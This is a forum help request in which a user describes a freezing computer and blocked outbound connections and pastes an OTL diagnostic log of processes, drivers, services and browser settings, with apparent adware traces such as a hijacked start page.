Jump to content

Free help from tech experts
Welcome to Geeks to Go forums. Create a FREE account now to gain access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing topics, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. Best of all, registration and all assistance is 100% free! This message, and all ads will be removed once you sign in.
Create an Account Login to Account

Computer Freezing and MalwareBytes blocking outbound attempts [Closed]


  • This topic is locked This topic is locked

#1
bigredyeeha

bigredyeeha

    Member

  • Member
  • PipPip
  • 33 posts
Hello,

My computer is freezing randomly, my browser is extremely slow and I am using malware bytes which keeps showing that it is blocking attempts to send info from my computer.

OTL logfile created on: 12/6/2013 3:10:41 PM - Run 5
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Jon Lowry\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16736)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

3.80 Gb Total Physical Memory | 2.00 Gb Available Physical Memory | 52.63% Memory free
7.60 Gb Paging File | 5.14 Gb Available in Paging File | 67.61% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 465.46 Gb Total Space | 150.80 Gb Free Space | 32.40% Space Free | Partition Type: NTFS

Computer Name: WOLFLING | User Name: Jon Lowry | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/12/06 15:09:59 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Jon Lowry\Desktop\OTL.exe
PRC - [2013/12/03 18:48:06 | 000,863,184 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/10/31 13:23:23 | 001,016,511 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Local\DownBook\DownBook.exe
PRC - [2013/06/05 09:28:40 | 027,370,808 | ---- | M] (Dropbox, Inc.) -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\Dropbox.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2012/02/15 12:58:00 | 000,577,408 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
PRC - [2012/02/15 12:58:00 | 000,034,872 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
PRC - [2012/01/03 05:10:42 | 000,063,928 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2011/03/21 10:56:16 | 001,230,704 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
PRC - [2010/08/02 11:14:22 | 000,136,488 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
PRC - [2010/05/21 01:28:36 | 000,140,272 | ---- | M] (CinemaNow, Inc.) -- C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
PRC - [2010/04/13 08:57:58 | 000,013,336 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2010/04/13 08:57:56 | 000,284,696 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2010/03/18 11:57:02 | 002,320,920 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
PRC - [2010/03/18 11:56:56 | 000,268,824 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe


========== Modules (No Company Name) ==========

MOD - [2013/12/03 18:48:04 | 000,399,312 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ppgooglenaclpluginchrome.dll
MOD - [2013/12/03 18:48:03 | 013,586,896 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll
MOD - [2013/12/03 18:48:02 | 004,055,504 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\pdf.dll
MOD - [2013/12/03 18:47:11 | 000,702,416 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libglesv2.dll
MOD - [2013/12/03 18:47:11 | 000,099,792 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libegl.dll
MOD - [2013/12/03 18:47:08 | 001,619,408 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ffmpegsumo.dll
MOD - [2013/10/31 13:23:23 | 001,016,511 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Local\DownBook\DownBook.exe
MOD - [2013/10/17 11:25:48 | 008,866,472 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll
MOD - [2013/10/09 12:29:19 | 012,436,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ef0a534be135cd8f0d99d938d8b1814a\System.Windows.Forms.ni.dll
MOD - [2013/10/09 12:28:32 | 003,348,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\4eef5a3a4d0ed6d6fd882947a70df530\WindowsBase.ni.dll
MOD - [2013/10/09 12:28:22 | 000,978,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\29f3ae8d313e62b4daed1107ccd29f9f\System.Configuration.ni.dll
MOD - [2013/09/10 23:58:53 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\d473c19e69818875b9c739cad8f386a5\System.Runtime.Remoting.ni.dll
MOD - [2013/08/15 00:45:27 | 000,452,608 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\a65a89dc687715adf46de23e717b842b\IAStorUtil.ni.dll
MOD - [2013/08/15 00:23:16 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5aa44bce7933e4de09d935848f868a4b\System.Drawing.ni.dll
MOD - [2013/08/15 00:22:53 | 005,464,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\09db78d6068543df01862a023aca785a\System.Xml.ni.dll
MOD - [2013/08/15 00:22:41 | 007,989,760 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\5d22a30e587e2cac106b81fb351e7c08\System.ni.dll
MOD - [2013/07/09 22:26:12 | 011,499,520 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9a6c1b7af18b4d5a91dc7f8d6617522f\mscorlib.ni.dll
MOD - [2013/03/13 12:48:52 | 024,978,944 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\libcef.dll
MOD - [2012/11/13 15:32:50 | 003,558,400 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
MOD - [2011/03/21 10:57:34 | 000,096,112 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2011/03/21 10:56:16 | 001,230,704 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe


========== Services (SafeList) ==========

SRV:64bit: - [2013/05/26 21:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2013/04/12 10:29:36 | 000,534,824 | ---- | M] (Aventail Corporation) [Auto | Running] -- C:\Windows\SysNative\ngvpnmgr.exe -- (NgVpnMgr)
SRV:64bit: - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV:64bit: - [2010/06/24 15:24:12 | 000,315,392 | ---- | M] (Realtek Semiconductor Corp.) [Auto | Running] -- C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe -- (RtVOsdService)
SRV:64bit: - [2010/06/18 15:26:18 | 000,103,992 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe -- (HP Wireless Assistant Service)
SRV:64bit: - [2009/11/17 18:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV:64bit: - [2009/07/13 17:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\svchost.exe -- (RemoteAccess)
SRV - [2013/11/17 23:57:39 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013/10/05 21:14:29 | 000,118,680 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013/07/01 17:13:30 | 004,569,856 | ---- | M] () [Auto | Running] -- c:\program files (x86)\common files\akamai/netsession_win_8fa3539.dll -- (Akamai)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/11/06 19:00:04 | 005,814,392 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Stopped] -- C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe -- (AVGIDSAgent)
SRV - [2012/10/22 13:05:08 | 000,196,664 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Stopped] -- C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe -- (avgwd)
SRV - [2012/09/27 10:55:16 | 000,086,528 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe -- (HP Support Assistant Service)
SRV - [2012/07/13 12:28:36 | 000,160,944 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012/02/15 12:58:00 | 000,034,872 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe -- (HPWMISVC)
SRV - [2012/01/03 05:10:42 | 000,063,928 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2011/04/16 12:49:30 | 000,082,224 | ---- | M] (ElcomSoft Co. Ltd.) [On_Demand | Stopped] -- C:\Program Files (x86)\Elcomsoft Password Recovery\Elcomsoft Wireless Security Auditor\ewsaserv64.exe -- (EWSASERV)
SRV - [2010/06/01 14:31:28 | 002,804,568 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU)
SRV - [2010/05/21 01:28:36 | 000,140,272 | ---- | M] (CinemaNow, Inc.) [Auto | Running] -- C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe -- (CinemaNow Service)
SRV - [2010/04/13 08:57:58 | 000,013,336 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2010/04/03 15:01:24 | 000,246,520 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\HP Games\HP Game Console\GameConsoleService.exe -- (GameConsoleService)
SRV - [2010/03/18 13:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2010/03/18 11:57:02 | 002,320,920 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2010/03/18 11:56:56 | 000,268,824 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2010/02/19 13:37:14 | 000,517,096 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe -- (SwitchBoard)
SRV - [2009/06/10 13:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)


========== Driver Services (SafeList) ==========

DRV:64bit: - File not found [Kernel | On_Demand | Stopped] -- C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys -- (esgiguard)
DRV:64bit: - [2013/04/12 05:38:40 | 000,103,496 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ngvpn.sys -- (NgVpn)
DRV:64bit: - [2013/04/12 05:38:40 | 000,031,304 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nglog.sys -- (NgLog)
DRV:64bit: - [2013/04/12 05:38:40 | 000,028,744 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ngwfp.sys -- (NgWfp)
DRV:64bit: - [2013/04/12 05:38:40 | 000,026,184 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ngfilter.sys -- (NgFilter)
DRV:64bit: - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:64bit: - [2013/02/11 20:12:06 | 000,019,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usb8023x.sys -- (usb_rndisx)
DRV:64bit: - [2012/10/22 13:02:44 | 000,154,464 | ---- | M] (AVG Technologies CZ, s.r.o. ) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgidsdrivera.sys -- (AVGIDSDriver)
DRV:64bit: - [2012/10/15 03:48:50 | 000,063,328 | ---- | M] (AVG Technologies CZ, s.r.o. ) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\avgidsha.sys -- (AVGIDSHA)
DRV:64bit: - [2012/10/05 03:32:50 | 000,111,456 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgmfx64.sys -- (Avgmfx64)
DRV:64bit: - [2012/10/02 03:30:38 | 000,185,696 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\avgldx64.sys -- (Avgldx64)
DRV:64bit: - [2012/09/21 03:46:04 | 000,200,032 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgtdia.sys -- (Avgtdia)
DRV:64bit: - [2012/09/21 03:46:00 | 000,225,120 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\avgloga.sys -- (Avgloga)
DRV:64bit: - [2012/09/14 03:05:18 | 000,040,800 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgrkx64.sys -- (Avgrkx64)
DRV:64bit: - [2012/08/23 06:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2012/08/23 06:07:35 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2012/08/20 15:48:50 | 000,019,032 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\pwdrvio.sys -- (pwdrvio)
DRV:64bit: - [2012/08/20 15:48:48 | 000,012,384 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\pwdspio.sys -- (pwdspio)
DRV:64bit: - [2012/02/29 22:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(5).sys -- (WsAudio_DeviceS(5)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(4).sys -- (WsAudio_DeviceS(4)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(3).sys -- (WsAudio_DeviceS(3)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(2).sys -- (WsAudio_DeviceS(2)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(1).sys -- (WsAudio_DeviceS(1)
DRV:64bit: - [2011/11/28 14:51:44 | 000,033,872 | ---- | M] (AnvSoft Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\anvsnddrv.sys -- (anvsnddrv)
DRV:64bit: - [2011/10/14 03:37:44 | 000,396,848 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:64bit: - [2011/09/05 20:04:00 | 000,243,744 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:64bit: - [2011/05/09 17:09:00 | 000,122,368 | ---- | M] (Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CT_U_USBSER.sys -- (Generalusbserialser20675)
DRV:64bit: - [2011/03/10 22:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/10 22:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/12/16 14:58:14 | 000,040,816 | ---- | M] (Elaborate Bytes AG) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ElbyCDIO.sys -- (ElbyCDIO)
DRV:64bit: - [2010/12/01 11:06:31 | 000,125,512 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AnyDVD.sys -- (AnyDVD)
DRV:64bit: - [2010/11/20 05:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 01:37:42 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2010/09/23 00:36:48 | 000,048,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2010/09/01 23:52:50 | 003,065,408 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)
DRV:64bit: - [2010/08/02 11:14:48 | 000,032,880 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\clwvd.sys -- (clwvd)
DRV:64bit: - [2010/07/28 20:10:42 | 010,610,400 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2010/05/31 11:46:50 | 000,333,928 | ---- | M] (Realtek ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2010/04/13 09:44:22 | 000,540,696 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2010/02/03 06:38:30 | 000,271,872 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2009/09/17 12:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/07/13 17:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 17:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 17:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 16:39:20 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDPrint.sys -- (WSDPrintDevice)
DRV:64bit: - [2009/07/13 16:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2009/06/19 18:09:57 | 001,394,688 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2009/06/10 13:01:11 | 001,485,312 | ---- | M] (Conexant Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VSTDPV6.SYS -- (SrvHsfV92)
DRV:64bit: - [2009/06/10 13:01:11 | 000,740,864 | ---- | M] (Conexant Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VSTCNXT6.SYS -- (SrvHsfWinac)
DRV:64bit: - [2009/06/10 13:01:11 | 000,292,864 | ---- | M] (Conexant Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VSTAZL6.SYS -- (SrvHsfHDA)
DRV:64bit: - [2009/06/10 13:01:06 | 001,146,880 | ---- | M] (LSI Corp) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\agrsm64.sys -- (AgereSoftModem)
DRV:64bit: - [2009/06/10 12:35:33 | 000,389,120 | ---- | M] (Marvell) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\yk62x64.sys -- (yukonw7)
DRV:64bit: - [2009/06/10 12:35:28 | 005,434,368 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netw5v64.sys -- (netw5v64)
DRV:64bit: - [2009/06/10 12:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 12:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 12:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 12:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV:64bit: - [2007/02/15 16:57:06 | 000,040,648 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ElbyCDFL.sys -- (ElbyCDFL)
DRV - [2010/12/01 11:06:31 | 000,125,512 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysWOW64\drivers\AnyDVD.sys -- (AnyDVD)
DRV - [2010/01/28 13:46:44 | 000,021,248 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Motive\MREMP50.sys -- (MREMP50)
DRV - [2010/01/28 13:46:42 | 000,020,096 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Motive\MRESP50.sys -- (MRESP50)
DRV - [2009/09/22 17:39:56 | 000,225,280 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV - [2009/07/13 17:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
DRV - [2007/02/15 16:57:06 | 000,040,648 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysWOW64\drivers\ElbyCDFL.sys -- (ElbyCDFL)
DRV - [1999/09/10 12:06:00 | 000,025,244 | ---- | M] (Adaptec) [Kernel | System | Stopped] -- C:\Windows\SysWow64\drivers\ASPI32.SYS -- (ASPI32)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE:64bit: - HKLM\..\SearchScopes,DefaultScope =
IE:64bit: - HKLM\..\SearchScopes\{4C6AB4BD-96D7-4335-97AB-C4588C2427C2}: "URL" = http://en.wikipedia....h={searchTerms}
IE:64bit: - HKLM\..\SearchScopes\{4FDD993D-F656-4134-8E18-AFCCC84F8912}: "URL" = http://search.yahoo....psg&type=HPNTDF
IE:64bit: - HKLM\..\SearchScopes\{CB469F30-480D-4846-B7EB-63F186F828BD}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://myserp.net/?s...=hp&w=1&t=7&s=1
IE - HKLM\..\URLSearchHook: {da51d4f6-3e7e-4ef8-b400-9198e0874606} - No CLSID value found
IE - HKLM\..\SearchScopes,DefaultScope = {58A73424-8E34-4585-BE7D-CB75CFC2385B}
IE - HKLM\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.sea...&cc=US&unqvl=40

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKCU\..\SearchScopes,DefaultScope = {58A73424-8E34-4585-BE7D-CB75CFC2385B}
IE - HKCU\..\SearchScopes\{58A73424-8E34-4585-BE7D-CB75CFC2385B}: "URL" = http://search.condui...1184459297&UM=2
